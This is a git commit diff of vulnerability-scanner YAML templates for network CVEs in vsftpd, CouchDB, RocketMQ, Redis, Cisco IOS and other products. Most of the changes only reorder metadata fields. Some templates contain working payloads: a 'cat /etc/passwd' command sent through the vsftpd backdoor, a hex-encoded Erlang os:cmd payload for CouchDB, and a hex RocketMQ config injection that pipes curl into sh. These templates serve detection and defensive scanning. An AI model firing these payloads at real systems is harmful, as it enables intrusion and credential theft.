Updated network CVEs
Prince Chaddha
parent
e418b30d19
commit
1bab419ce5
|
|
@ -5,12 +5,12 @@ info:
|
|||
author: iamthefrogy
|
||||
severity: high
|
||||
description: SSHv1 is deprecated and has known cryptographic issues.
|
||||
remediation: Upgrade to SSH 2.4 or later.
|
||||
reference:
|
||||
- https://www.kb.cert.org/vuls/id/684820
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
|
||||
- http://www.kb.cert.org/vuls/id/684820
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/6603
|
||||
remediation: Upgrade to SSH 2.4 or later.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
||||
cvss-score: 7.5
|
||||
|
|
|
|||
|
|
@ -6,14 +6,14 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.
|
||||
remediation: |
|
||||
Update to the latest version of VSFTPD, which does not contain the backdoor.
|
||||
reference:
|
||||
- https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
|
||||
- https://www.exploit-db.com/exploits/49757
|
||||
- http://packetstormsecurity.com/files/162145/vsftpd-2.3.4-Backdoor-Command-Execution.html
|
||||
- https://access.redhat.com/security/cve/cve-2011-2523
|
||||
- https://security-tracker.debian.org/tracker/CVE-2011-2523
|
||||
remediation: |
|
||||
Update to the latest version of VSFTPD, which does not contain the backdoor.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
@ -22,15 +22,14 @@ info:
|
|||
epss-score: 0.87236
|
||||
cpe: cpe:2.3:a:vsftpd_project:vsftpd:2.3.4:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 2
|
||||
verified: true
|
||||
shodan-query: product:"vsftpd"
|
||||
max-request: 2
|
||||
vendor: vsftpd_project
|
||||
product: vsftpd
|
||||
shodan-query: product:"vsftpd"
|
||||
tags: cve,cve2011,network,vsftpd,ftp,backdoor
|
||||
variables:
|
||||
cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Host}}:21"
|
||||
|
|
|
|||
|
|
@ -5,13 +5,13 @@ info:
|
|||
author: pdteam
|
||||
severity: critical
|
||||
description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
|
||||
remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
|
||||
reference:
|
||||
- https://github.com/t0kx/exploit-CVE-2015-3306
|
||||
- https://www.exploit-db.com/exploits/36803/
|
||||
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
|
||||
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-3306
|
||||
remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
|
||||
cvss-score: 10
|
||||
|
|
@ -24,7 +24,6 @@ info:
|
|||
vendor: proftpd
|
||||
product: proftpd
|
||||
tags: cve,cve2015,ftp,rce,network,proftpd,edb
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
|||
|
|
@ -5,14 +5,14 @@ info:
|
|||
author: pussycat0x
|
||||
severity: critical
|
||||
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
|
||||
remediation: |
|
||||
Upgrade to the most recent version of HP Data Protector.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/39858
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
|
||||
- http://www.kb.cert.org/vuls/id/267328
|
||||
- https://www.exploit-db.com/exploits/39858/
|
||||
- http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
|
||||
remediation: |
|
||||
Upgrade to the most recent version of HP Data Protector.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
@ -25,7 +25,6 @@ info:
|
|||
vendor: hp
|
||||
product: data_protector
|
||||
tags: cve,cve2016,network,iot,hp,rce,edb
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
|||
|
|
@ -6,13 +6,13 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
|
||||
remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
|
||||
reference:
|
||||
- https://github.com/artkond/cisco-rce
|
||||
- https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
|
||||
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-3881
|
||||
- http://www.securitytracker.com/id/1038059
|
||||
remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
@ -25,7 +25,6 @@ info:
|
|||
vendor: cisco
|
||||
product: ios
|
||||
tags: cve,cve2017,cisco,rce,network,kev,msf
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
|||
|
|
@ -6,14 +6,14 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.
|
||||
remediation: |
|
||||
Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-5645
|
||||
- http://www.openwall.com/lists/oss-security/2019/12/19/2
|
||||
- http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
|
||||
- http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
|
||||
remediation: |
|
||||
Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
@ -26,10 +26,8 @@ info:
|
|||
vendor: apache
|
||||
product: log4j
|
||||
tags: cve,cve2017,vulhub,network,apache,log4j,rce,deserialization,oast,
|
||||
|
||||
variables:
|
||||
end: "\r\n"
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
|||
|
|
@ -6,13 +6,13 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
|
||||
remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory
|
||||
reference:
|
||||
- https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-2628
|
||||
- http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
|
||||
- http://web.archive.org/web/20211207132829/https://securitytracker.com/id/1040696
|
||||
- http://www.securitytracker.com/id/1040696
|
||||
remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
@ -25,7 +25,6 @@ info:
|
|||
vendor: oracle
|
||||
product: weblogic_server
|
||||
tags: cve,cve2018,oracle,weblogic,network,deserialization,kev
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
|||
|
|
@ -5,13 +5,13 @@ info:
|
|||
author: milo2012
|
||||
severity: critical
|
||||
description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
|
||||
remediation: https://access.redhat.com/solutions/4851251
|
||||
reference:
|
||||
- https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-1938
|
||||
- https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
|
||||
- https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E
|
||||
- http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html
|
||||
remediation: https://access.redhat.com/solutions/4851251
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
@ -21,11 +21,10 @@ info:
|
|||
cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 4
|
||||
shodan-query: title:"Apache Tomcat"
|
||||
vendor: apache
|
||||
product: geode
|
||||
shodan-query: title:"Apache Tomcat"
|
||||
tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
|||
|
|
@ -6,13 +6,13 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
|
||||
remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6
|
||||
reference:
|
||||
- https://www.openwall.com/lists/oss-security/2020/01/28/3
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-7247
|
||||
- https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45
|
||||
- http://www.openwall.com/lists/oss-security/2020/01/28/3
|
||||
- http://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.html
|
||||
remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
|
|||
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: Y4er
|
||||
severity: critical
|
||||
description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.'
|
||||
remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
|
||||
reference:
|
||||
- https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44521
|
||||
|
|
@ -12,7 +13,6 @@ info:
|
|||
- https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356
|
||||
- http://www.openwall.com/lists/oss-security/2022/02/11/4
|
||||
- https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/
|
||||
remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 9.1
|
||||
|
|
|
|||
|
|
@ -9,13 +9,13 @@ info:
|
|||
vulnerability was introduced by Debian and Ubuntu Redis packages that
|
||||
insufficiently sanitized the Lua environment. The maintainers failed to
|
||||
disable the package interface, allowing attackers to load arbitrary libraries.
|
||||
remediation: Update to the most recent versions currently available.
|
||||
reference:
|
||||
- https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
|
||||
- https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
|
||||
- https://bugs.debian.org/1005787
|
||||
- https://www.debian.org/security/2022/dsa-5081
|
||||
- https://lists.debian.org/debian-security-announce/2022/msg00048.html
|
||||
remediation: Update to the most recent versions currently available.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10
|
||||
|
|
@ -24,11 +24,10 @@ info:
|
|||
cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 4
|
||||
shodan-query: redis_version
|
||||
vendor: redis
|
||||
product: redis
|
||||
shodan-query: redis_version
|
||||
tags: cve,cve2022,network,redis,unauth,rce,kev
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
|||
|
|
@ -6,14 +6,14 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
|
||||
remediation: |
|
||||
Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50914
|
||||
- https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-24706
|
||||
- http://www.openwall.com/lists/oss-security/2022/04/26/1
|
||||
- http://www.openwall.com/lists/oss-security/2022/05/09/1
|
||||
remediation: |
|
||||
Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
@ -22,19 +22,17 @@ info:
|
|||
epss-score: 0.97407
|
||||
cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 2
|
||||
shodan-query: product:"CouchDB"
|
||||
verified: "true"
|
||||
max-request: 2
|
||||
vendor: apache
|
||||
product: couchdb
|
||||
shodan-query: product:"CouchDB"
|
||||
tags: cve,cve2022,network,couch,rce,kev
|
||||
|
||||
variables:
|
||||
name_msg: "00156e00050007499c4141414141414041414141414141"
|
||||
challenge_reply: "00157201020304"
|
||||
cookie: "monster"
|
||||
cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
|||
|
|
@ -6,13 +6,13 @@ info:
|
|||
severity: high
|
||||
description: |
|
||||
muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.
|
||||
remediation: Update the application to version 1.10
|
||||
reference:
|
||||
- https://derekabdine.com/blog/2022-arris-advisory.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31793
|
||||
- https://derekabdine.com/blog/2022-arris-advisory
|
||||
- https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/
|
||||
- http://inglorion.net/software/muhttpd/
|
||||
remediation: Update the application to version 1.10
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
|
|
@ -21,12 +21,11 @@ info:
|
|||
epss-score: 0.25931
|
||||
cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: inglorion
|
||||
product: muhttpd
|
||||
tags: cve,cve2022,network,muhttpd,lfi,unauth
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
|||
|
|
@ -6,13 +6,13 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .
|
||||
remediation: Update the RocketMQ application to version 5.1.1
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-33246
|
||||
- https://github.com/I5N0rth/CVE-2023-33246
|
||||
- http://packetstormsecurity.com/files/173339/Apache-RocketMQ-5.1.0-Arbitrary-Code-Injection.html
|
||||
- http://www.openwall.com/lists/oss-security/2023/07/12/1
|
||||
- https://lists.apache.org/thread/1s8j2c8kogthtpv3060yddk03zq0pxyp
|
||||
remediation: Update the RocketMQ application to version 5.1.1
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
@ -21,14 +21,13 @@ info:
|
|||
epss-score: 0.95581
|
||||
cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
fofa-query: protocol="rocketmq"
|
||||
max-request: 2
|
||||
shodan-query: title:"RocketMQ"
|
||||
verified: true
|
||||
max-request: 2
|
||||
vendor: apache
|
||||
product: rocketmq
|
||||
shodan-query: title:"RocketMQ"
|
||||
fofa-query: protocol="rocketmq"
|
||||
tags: cve,cve2023,rocketmq,rce,oast,intrusive,network
|
||||
|
||||
variables:
|
||||
part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}'
|
||||
part_b: '{{ hex_decode("3b0a") }}'
|
||||
|
|
|
|||
Loading…
Reference in New Issue